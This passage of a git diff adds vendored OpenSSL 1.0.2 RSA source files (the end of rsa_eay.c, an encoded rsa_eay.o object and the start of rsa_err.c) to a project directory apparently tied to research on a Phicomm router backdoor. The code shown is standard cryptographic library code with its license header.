+        RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /*
+     * This check was for equality but PGP does evil things and chops off the
+     * top '0' bytes
+     */
+    if (flen > num) {
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_DATA_GREATER_THAN_MOD_LEN);
+        goto err;
+    }
+
+    if (BN_bin2bn(from, flen, f) == NULL)
+        goto err;
+
+    if (BN_ucmp(f, rsa->n) >= 0) {
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT,
+               RSA_R_DATA_TOO_LARGE_FOR_MODULUS);
+        goto err;
+    }
+
+    if (rsa->flags & RSA_FLAG_CACHE_PUBLIC)
+        if (!BN_MONT_CTX_set_locked
+            (&rsa->_method_mod_n, CRYPTO_LOCK_RSA, rsa->n, ctx))
+            goto err;
+
+    if (!rsa->meth->bn_mod_exp(ret, f, rsa->e, rsa->n, ctx,
+                               rsa->_method_mod_n))
+        goto err;
+
+    if ((padding == RSA_X931_PADDING) && ((ret->d[0] & 0xf) != 12))
+        if (!BN_sub(ret, rsa->n, ret))
+            goto err;
+
+    p = buf;
+    i = BN_bn2bin(ret, p);
+
+    switch (padding) {
+    case RSA_PKCS1_PADDING:
+        r = RSA_padding_check_PKCS1_type_1(to, num, buf, i, num);
+        break;
+    case RSA_X931_PADDING:
+        r = RSA_padding_check_X931(to, num, buf, i, num);
+        break;
+    case RSA_NO_PADDING:
+        r = RSA_padding_check_none(to, num, buf, i, num);
+        break;
+    default:
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_UNKNOWN_PADDING_TYPE);
+        goto err;
+    }
+    if (r < 0)
+        RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_PADDING_CHECK_FAILED);
+
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    if (buf != NULL) {
+        OPENSSL_cleanse(buf, num);
+        OPENSSL_free(buf);
+    }
+    return (r);
+}
+
+static int RSA_eay_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa, BN_CTX *ctx)
+{
+    BIGNUM *r1, *m1, *vrfy;
+    BIGNUM local_dmp1, local_dmq1, local_c, local_r1;
+    BIGNUM *dmp1, *dmq1, *c, *pr1;
+    int ret = 0;
+
+    BN_CTX_start(ctx);
+    r1 = BN_CTX_get(ctx);
+    m1 = BN_CTX_get(ctx);
+    vrfy = BN_CTX_get(ctx);
+
+    {
+        BIGNUM local_p, local_q;
+        BIGNUM *p = NULL, *q = NULL;
+
+        /*
+         * Make sure BN_mod_inverse in Montgomery intialization uses the
+         * BN_FLG_CONSTTIME flag (unless RSA_FLAG_NO_CONSTTIME is set)
+         */
+        if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+            BN_init(&local_p);
+            p = &local_p;
+            BN_with_flags(p, rsa->p, BN_FLG_CONSTTIME);
+
+            BN_init(&local_q);
+            q = &local_q;
+            BN_with_flags(q, rsa->q, BN_FLG_CONSTTIME);
+        } else {
+            p = rsa->p;
+            q = rsa->q;
+        }
+
+        if (rsa->flags & RSA_FLAG_CACHE_PRIVATE) {
+            if (!BN_MONT_CTX_set_locked
+                (&rsa->_method_mod_p, CRYPTO_LOCK_RSA, p, ctx))
+                goto err;
+            if (!BN_MONT_CTX_set_locked
+                (&rsa->_method_mod_q, CRYPTO_LOCK_RSA, q, ctx))
+                goto err;
+        }
+    }
+
+    if (rsa->flags & RSA_FLAG_CACHE_PUBLIC)
+        if (!BN_MONT_CTX_set_locked
+            (&rsa->_method_mod_n, CRYPTO_LOCK_RSA, rsa->n, ctx))
+            goto err;
+
+    /* compute I mod q */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        c = &local_c;
+        BN_with_flags(c, I, BN_FLG_CONSTTIME);
+        if (!BN_mod(r1, c, rsa->q, ctx))
+            goto err;
+    } else {
+        if (!BN_mod(r1, I, rsa->q, ctx))
+            goto err;
+    }
+
+    /* compute r1^dmq1 mod q */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        dmq1 = &local_dmq1;
+        BN_with_flags(dmq1, rsa->dmq1, BN_FLG_CONSTTIME);
+    } else
+        dmq1 = rsa->dmq1;
+    if (!rsa->meth->bn_mod_exp(m1, r1, dmq1, rsa->q, ctx, rsa->_method_mod_q))
+        goto err;
+
+    /* compute I mod p */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        c = &local_c;
+        BN_with_flags(c, I, BN_FLG_CONSTTIME);
+        if (!BN_mod(r1, c, rsa->p, ctx))
+            goto err;
+    } else {
+        if (!BN_mod(r1, I, rsa->p, ctx))
+            goto err;
+    }
+
+    /* compute r1^dmp1 mod p */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        dmp1 = &local_dmp1;
+        BN_with_flags(dmp1, rsa->dmp1, BN_FLG_CONSTTIME);
+    } else
+        dmp1 = rsa->dmp1;
+    if (!rsa->meth->bn_mod_exp(r0, r1, dmp1, rsa->p, ctx, rsa->_method_mod_p))
+        goto err;
+
+    if (!BN_sub(r0, r0, m1))
+        goto err;
+    /*
+     * This will help stop the size of r0 increasing, which does affect the
+     * multiply if it optimised for a power of 2 size
+     */
+    if (BN_is_negative(r0))
+        if (!BN_add(r0, r0, rsa->p))
+            goto err;
+
+    if (!BN_mul(r1, r0, rsa->iqmp, ctx))
+        goto err;
+
+    /* Turn BN_FLG_CONSTTIME flag on before division operation */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        pr1 = &local_r1;
+        BN_with_flags(pr1, r1, BN_FLG_CONSTTIME);
+    } else
+        pr1 = r1;
+    if (!BN_mod(r0, pr1, rsa->p, ctx))
+        goto err;
+
+    /*
+     * If p < q it is occasionally possible for the correction of adding 'p'
+     * if r0 is negative above to leave the result still negative. This can
+     * break the private key operations: the following second correction
+     * should *always* correct this rare occurrence. This will *never* happen
+     * with OpenSSL generated keys because they ensure p > q [steve]
+     */
+    if (BN_is_negative(r0))
+        if (!BN_add(r0, r0, rsa->p))
+            goto err;
+    if (!BN_mul(r1, r0, rsa->q, ctx))
+        goto err;
+    if (!BN_add(r0, r1, m1))
+        goto err;
+
+    if (rsa->e && rsa->n) {
+        if (!rsa->meth->bn_mod_exp(vrfy, r0, rsa->e, rsa->n, ctx,
+                                   rsa->_method_mod_n))
+            goto err;
+        /*
+         * If 'I' was greater than (or equal to) rsa->n, the operation will
+         * be equivalent to using 'I mod n'. However, the result of the
+         * verify will *always* be less than 'n' so we don't check for
+         * absolute equality, just congruency.
+         */
+        if (!BN_sub(vrfy, vrfy, I))
+            goto err;
+        if (!BN_mod(vrfy, vrfy, rsa->n, ctx))
+            goto err;
+        if (BN_is_negative(vrfy))
+            if (!BN_add(vrfy, vrfy, rsa->n))
+                goto err;
+        if (!BN_is_zero(vrfy)) {
+            /*
+             * 'I' and 'vrfy' aren't congruent mod n. Don't leak
+             * miscalculated CRT output, just do a raw (slower) mod_exp and
+             * return that instead.
+             */
+
+            BIGNUM local_d;
+            BIGNUM *d = NULL;
+
+            if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+                d = &local_d;
+                BN_with_flags(d, rsa->d, BN_FLG_CONSTTIME);
+            } else
+                d = rsa->d;
+            if (!rsa->meth->bn_mod_exp(r0, I, d, rsa->n, ctx,
+                                       rsa->_method_mod_n))
+                goto err;
+        }
+    }
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    return (ret);
+}
+
+static int RSA_eay_init(RSA *rsa)
+{
+    rsa->flags |= RSA_FLAG_CACHE_PUBLIC | RSA_FLAG_CACHE_PRIVATE;
+    return (1);
+}
+
+static int RSA_eay_finish(RSA *rsa)
+{
+    if (rsa->_method_mod_n != NULL)
+        BN_MONT_CTX_free(rsa->_method_mod_n);
+    if (rsa->_method_mod_p != NULL)
+        BN_MONT_CTX_free(rsa->_method_mod_p);
+    if (rsa->_method_mod_q != NULL)
+        BN_MONT_CTX_free(rsa->_method_mod_q);
+    return (1);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_eay.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_eay.o
new file mode 100644
index 0000000000000000000000000000000000000000..7080978c70f78b53dfcd0ebd793fa99053cc4665
GIT binary patch
literal 14184
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_err.c
new file mode 100644
index 0000000..0bab05e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_err.c
@@ -0,0 +1,247 @@
+/* crypto/rsa/rsa_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/rsa.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_RSA,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_RSA,0,reason)
+
+static ERR_STRING_DATA RSA_str_functs[] = {
+    {ERR_FUNC(RSA_F_CHECK_PADDING_MD), "CHECK_PADDING_MD"},
+    {ERR_FUNC(RSA_F_DO_RSA_PRINT), "DO_RSA_PRINT"},
+    {ERR_FUNC(RSA_F_INT_RSA_VERIFY), "INT_RSA_VERIFY"},
+    {ERR_FUNC(RSA_F_MEMORY_LOCK), "MEMORY_LOCK"},
+    {ERR_FUNC(RSA_F_OLD_RSA_PRIV_DECODE), "OLD_RSA_PRIV_DECODE"},
+    {ERR_FUNC(RSA_F_PKEY_RSA_CTRL), "PKEY_RSA_CTRL"},
+    {ERR_FUNC(RSA_F_PKEY_RSA_CTRL_STR), "PKEY_RSA_CTRL_STR"},
+    {ERR_FUNC(RSA_F_PKEY_RSA_SIGN), "PKEY_RSA_SIGN"},
+    {ERR_FUNC(RSA_F_PKEY_RSA_VERIFY), "PKEY_RSA_VERIFY"},
+    {ERR_FUNC(RSA_F_PKEY_RSA_VERIFYRECOVER), "PKEY_RSA_VERIFYRECOVER"},
+    {ERR_FUNC(RSA_F_RSA_ALGOR_TO_MD), "RSA_ALGOR_TO_MD"},
+    {ERR_FUNC(RSA_F_RSA_BUILTIN_KEYGEN), "RSA_BUILTIN_KEYGEN"},
+    {ERR_FUNC(RSA_F_RSA_CHECK_KEY), "RSA_check_key"},
+    {ERR_FUNC(RSA_F_RSA_CMS_DECRYPT), "RSA_CMS_DECRYPT"},
+    {ERR_FUNC(RSA_F_RSA_EAY_PRIVATE_DECRYPT), "RSA_EAY_PRIVATE_DECRYPT"},
+    {ERR_FUNC(RSA_F_RSA_EAY_PRIVATE_ENCRYPT), "RSA_EAY_PRIVATE_ENCRYPT"},
+    {ERR_FUNC(RSA_F_RSA_EAY_PUBLIC_DECRYPT), "RSA_EAY_PUBLIC_DECRYPT"},
+    {ERR_FUNC(RSA_F_RSA_EAY_PUBLIC_ENCRYPT), "RSA_EAY_PUBLIC_ENCRYPT"},
+    {ERR_FUNC(RSA_F_RSA_GENERATE_KEY), "RSA_generate_key"},
+    {ERR_FUNC(RSA_F_RSA_GENERATE_KEY_EX), "RSA_generate_key_ex"},
+    {ERR_FUNC(RSA_F_RSA_ITEM_VERIFY), "RSA_ITEM_VERIFY"},
+    {ERR_FUNC(RSA_F_RSA_MEMORY_LOCK), "RSA_memory_lock"},
+    {ERR_FUNC(RSA_F_RSA_MGF1_TO_MD), "RSA_MGF1_TO_MD"},
+    {ERR_FUNC(RSA_F_RSA_NEW_METHOD), "RSA_new_method"},
+    {ERR_FUNC(RSA_F_RSA_NULL), "RSA_NULL"},
+    {ERR_FUNC(RSA_F_RSA_NULL_MOD_EXP), "RSA_NULL_MOD_EXP"},
+    {ERR_FUNC(RSA_F_RSA_NULL_PRIVATE_DECRYPT), "RSA_NULL_PRIVATE_DECRYPT"},
+    {ERR_FUNC(RSA_F_RSA_NULL_PRIVATE_ENCRYPT), "RSA_NULL_PRIVATE_ENCRYPT"},
+    {ERR_FUNC(RSA_F_RSA_NULL_PUBLIC_DECRYPT), "RSA_NULL_PUBLIC_DECRYPT"},
+    {ERR_FUNC(RSA_F_RSA_NULL_PUBLIC_ENCRYPT), "RSA_NULL_PUBLIC_ENCRYPT"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_NONE), "RSA_padding_add_none"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_PKCS1_OAEP),
+     "RSA_padding_add_PKCS1_OAEP"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_PKCS1_OAEP_MGF1),
+     "RSA_padding_add_PKCS1_OAEP_mgf1"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_PKCS1_PSS), "RSA_padding_add_PKCS1_PSS"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_PKCS1_PSS_MGF1),
+     "RSA_padding_add_PKCS1_PSS_mgf1"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_1),
+     "RSA_padding_add_PKCS1_type_1"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_2),
+     "RSA_padding_add_PKCS1_type_2"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_SSLV23), "RSA_padding_add_SSLv23"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_ADD_X931), "RSA_padding_add_X931"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_CHECK_NONE), "RSA_padding_check_none"},
+    {ERR_FUNC(RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP),
